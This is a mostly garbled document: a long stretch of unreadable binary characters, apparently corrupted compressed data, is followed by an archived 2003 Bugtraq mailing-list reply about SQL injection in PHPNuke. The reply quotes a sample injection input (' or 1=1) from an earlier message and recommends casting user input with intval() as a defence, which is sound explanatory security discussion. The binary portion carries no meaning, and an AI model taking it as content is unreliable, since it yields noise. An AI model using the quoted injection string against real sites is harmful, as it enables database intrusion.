���Ý£U>��í�kWÛ¸²_í_¡¦K��I toÙC!´ly- û*�c+ÄàØ©í@iÿ~gF²-'¶»=Ý{ϱZ §4�ÍCÎ$âa�{�¯�&¾�»�-ÛO¾á¨7êõõµµ'õz½ñòE]ýcu±þ¤þr½ùbµñ²Ñ�ºÆ�<=aõo9Æ$±'5¬Gè>ÿ?�+ÿhè�ÿ3�®ç^�cï�Ç�¸Üa�ÁG×ó,æÆ��q?¶Ð½X0`�VÄ××�d2VtýëÛÞÄál#�ϽX�n²�v`y^`ç±nHÄ�Æ¡ëÇ�ü�p�º~�¸�[¬�ï·�¹�y?føÇÐ?éL�A�Æí�ä�*ðl*|"3Îd<>˸O?q/â0Ë©Wļk¥N��aK®µ~:óKF{pãÊRÃP�Þëºn�á�À~¸Q}íÝ93�_Úzµ½ÓÙ}ýfïç·û�GÇ¿t{§¿þöû�Z�¶Ã�C÷êÚ�ùÁø}�ÅÛ�w�ëæêÚõ?þ§ºR�5:ÌÁ7rG¼Ï};px_ì<«Ø�gbFÊ�]¿&?�81ôÄÜK�¼0v�Hð³*æo7 ²ßÕÏåsS<7çUñÜg� èj�éRíÆæfSÏb+�PñÕ?¬���lÍ`1�5 ´[7Øæ&���Ñ��ø`ÛÄ¿n<¨\ÒîJ
é.6î°°£´*ÑäâÛqÍqÜÔÀãI�ºêm�:îv
þìpØ� ½cr})ÔcL��8Çkl
²*XE
�°JÂg²ÃÓýýì@Èõ PjÀ�|¹�!ALÇL´�à �YÅERPÛ)nl�ÿ.Á_¡ár*v®�VÄI
�-YYd�� 2ÿôÑ,«¨0�¦æá_t?'omZø
�u}fÃBÐ��`vZBÁÜÉì!"q`]S6¡�±z®D/Øì+õ�ÎUrsÄÌòY½�ÁFT®ÌzûjÃm_U«Fn�Àq
äYÕjNÓ¼ÝÀ� öbZ[mµY�D.´Me^ÓÆ�&[L)[tBá]t²þílüýÇd~ý7ü:>Sÿ�úÅLý÷âeQÿ}1'TÒQ2H{Ni¤ ÿíE�ãoÜù�Y®ÿm[?�ÿÆËÕFsêü¯®¿\/Îÿ÷�_ÞÿÉ>ï8� }ÿP¿Û|�³ãáøprÍYG8Ѳ¤{�mß
øùò�OíåJJ6*Íiât�:7ÇlyYÁ�ÀÁþO�ä%A�_ÜùÖ«�î¢ønÌ#�G}Íc)]ÁÅP±�ô�´>®Ïµ½ÃãnW[' v°õ;ØzJÆz{�£Ó^ÿ� 8f�]¦PCõuºß;>:éi?*ðÎ/§nOÓJ¯;=¶âú�ÿ°<�Ù^ïx¥±\ïL×�ÿ�ÖÛb���àQ�À�>à!�q�ÇãÖÊÊííí²g
g-ÛÁ�I�Ýv�\»¼Å0&�Q)�pæÿø,&��TwÅÒÕÙÂÞÙÑ �ß:ÌsÁGÊ�QË+�!ðlô¶N`9§{;e¶u¸ÃÈxû{o;¬,P� ~ 1Ë�G§'HÜ¿o¶ºo:;O7Dª\p°
(ÕH"�"³¼à´\Çyï¸í¹ã�¬�×¢îß«ÓÝÝÎ ÓÖi¯TäNçÕékM«£_hGÇÛ{G]lo5øá~�i�uT�¸N?ä' LµÅ±�E P4= e@ý;ɨ©Z�Y±=ìG14ú*í�ܦZ
�¸Üsú�½!1#��+µsXT�ü¨2"¸/Öä���LìXC··��dù��®O�5my%2²®y�ñ²4ÀSUAHÝ=�Ã�l25!!�l¢�]�åµu-ýlæe�?B ¡A·ò>ë�HÒ¦¯8¸¸âp¡éñ�ÄP¼GwÃI�
�w�Ýrh÷ºvñAå¹²¦�Ö,�
¦¹*+7G¡\\¿?°F®wg¦³_Ú�%0~Ì!GSÃ�V
¬�$#>²Çw¹9�)J©ÍÈÍC<î_ÆC£
û´k�¥Jóë4�8
�C�b0ð&Ñ�íW*ʽ��<ñý�TÈíO´
è#h�
\éb2èÑ�l¹ÅÇ8-¯/�éÎk�'o,áß�*màô#.dâ�è�Ó9ë2Eàlíö÷�;½Z÷hûm¿Û;él�Ôê{
ÍãîaÃ�Ñ�B\z�6í�(
ò�'¯¤µiw`Æ<§Q@!§�²(8�É�½e-&¥[q$g�Zé�`îôå�dÂ�ĺSÓÀ�ļåÖÕ`úà+d'
ÍÄÖjÑÆ8£ÍÓ!Èj
J§Ö^W¶�@,�!·oÄ4jFI[R0+Ê��¨jJÒvwúvN*Ï�O1$´Ûé
%yô°åø�@¶æÓ)ÜDE
óÝ�]WX%ÆF¶xöü9£�§f]<°{£T�Ù4j�ÈůçR£Ál©Á�s´½
âÄOò¶!9O÷��Åc�ÐJheÉe(ÂéTG¤%�GÑ9íäYn¾ò�M<|Ì"õ
øN�BúE�øîÞ~GÃ+Âþ�LDgU!0¥aª5ªòæ<dyg
$�Uò¡Qm4Ûx�ßh2×)GBaÎg�WÓ"°6
ª?¾º�ä©$Ù(¢¦&è�ËVWcøÕr«%¿ND®||@ɲF£��dg¹â�XiÆcåx�5e�¹×x�ª^Ä
2Y.¦Æ¦´<H=FfÊ©�ò
ÜèÁ�
rX-!¥ÕÍ�¡ã߸�ø_b$rÑAA¿e°65U)�3ÂNøÅD�
ü�¦%WlfRðd�[
f��ÁÌÔµ(ÆCÎäL\Y���R$Ã��c0H
%Õ�ËÃxTªnE´¦ü�¢l!<MÚ2Ü÷Â;�êQ�iHâ}.âk�´²¤�®¦Ö4"椺�x?oÉͺäæÿøï¥ÛãÂÿ਩e5&p""¸Z£äç�T'Ï�\�B*ªð!SNK´âÉ�òeÔ�_Ä«>TI®£ÖÓ�.�ù�HÞɾ²o¶°ôbB )æ'Î0�¥
DdC¤+"�2�A
+÷Ë5¡JX;ihJ�Èiâ4sp�G[eâIÙÈäìMÙ�Ë¢-·\*�ÖjëJA�ÕS,DÐá±vJµ,Ê'Ù[¢7̤ñ¦lý :&�¢ç,<zÛúª"ZÓ��_h ¥Â�Ãzgg-S¼¹Zº~�GQ�Ýø�öË,½¿åÐjLÜ�¶Â�\�¯®½�ì�ôËoÞ�§{G dg÷õßîÿùûö¯¯���Ò·°õWiGJü!{IûðÜôåïô»ß¥RÒ�^�ÐæÓNLÙOñä´ØÐìI�B��õö<$J#�M�f.ᱨmtM�ä
�E1�-u{_b;/ñ;o¼�çLC�T�5/sÍü*ÙFÞ
"�K�r£¼ö<ó¹)÷íj��S~üȤæ8q
²cJSC~2b¶³ûD¡Z:ô§i
É��Uè¦Ô*r}��"%kL÷Gg¾Ì�Tvaû/t
I~È(�Ð�ØOÌx$¥ÜÏ9·÷Ò¥'uxó8�.CkD�ÑFIà�ç8jÓ¦À'�jC�á,n,�5�ùn)
Τ�=C1bjRGqL74�Ãò(O�¥yl�QðÒu
ÔæóHv%
®`�>�êazä{wÌ&9ìlwº['{]��Ú
n20á�J�Ð
¶éÒ�T
Á8¦÷OVxi'Í��_(�ÐÍ»ó./%sCýÊ
e�D4þ!æ�S���÷e�_̨ZD%iÖÄE)îõèrDSüT£�"�øÔ¥öc��®íZ^;@¢¥gY��cÛ
2�ç±±.ãðXZrý|ÎE�H��`J»ÑB¥V�¶[^+hMZãÖ µÛ�µâa<5�R~tëk
þ,*@¢å�0Zú&DXÑç�x
F±Fb�â�üþºeZùXÊ%;�[�xRhµ�õ¹ZÙK��Ó
ùÕï!�é=ø´"�OôWÍ`
s]å�Û6ß>bd¼S�ûJ-Tn>ªb¬î°Ä�jH9�W0
Ôà÷Å:T¦ÇÕÄRM®{jLÓ�¶©ëy·ÙÙB�
Á5ufSWRSÕ}zK8�ûë/ö45
=)·å�¤Ä¯�6ÕÕ�©¸Ð�å2�Cå½
Ê^�>A^uÏi·éºoÆvÒB¬´°À6¡êNîB¤´P�»coæØñ�ãü�a�è�ü�Y¹KXZi®4�ñmN±�ý*6?"S�ò´ÆPãÚ!%/6HJdÖ�©tfúä�õÎiÕ�g,Ò>SEï¼Â®
D:21�Uè[{QÊý´5T
QÊâQ§Óñ¬qÄ�z1©¸µà°.§ÃA¬lIÅ3¬Ñ�T
Á�º5GÄ|²�ûz_|
åoÜ÷?�àXã�Ê7Öñ¹ï5ק¿ÿ±Ö\+¾ÿÿ]Æ3ýVJö½¤?Óuì¡è&ßèÐm[>Bt-�±Åå
Á@A�r]ïìw�:½.3YöJçå@OhIä��b m«Ïl)«#+��-ú^*´Uób�£�Å(F1Qb�£�Å(F1Qb�£�Å(F1Qb�£�Å;þ�[¬È�P��
(91336) /Oriol Carreas <uri@7a69ezine.org>/(Ombruten)
91520 2003-02-24 19:59 /31 rader/ <alias@securityfocus.com>
Importerad: 2003-02-24 19:59 av Brevbäraren
Mottagare: Bugtraq (import) <3642>
Ärende: Re[2]: PHPNuke SQL Injection / General SQL Injection
------------------------------------------------------------
MightyE,
In response to your mail of Saturday 22 February 2003 at 21:20:29:
M> Actually, user supplied input from $_COOKIES, $_POST, and $_GET
M> comes slash-escaped, so if the user enters
M> ' or 1=1
M> as their input, the sql statement will look like
M> where some_int='\' or 1=1'
M> [..snip..]
M> function escape($input){
M> if (get_magic_quotes_gpc()) return $input;
M> return addslashes($input);
M> }
M> [..snip..]
Better still, always do this:
...WHERE id = ". intval($userinput) ." AND...
which doesn't rely on local configuration, magicquotes etc., and
resolves to (e.g.) "id = 0" when the $userinput is bad or missing.
Safe, simple, portable and effective.
--
Best regards,
James.
(91520) / <alias@securityfocus.com>/----------------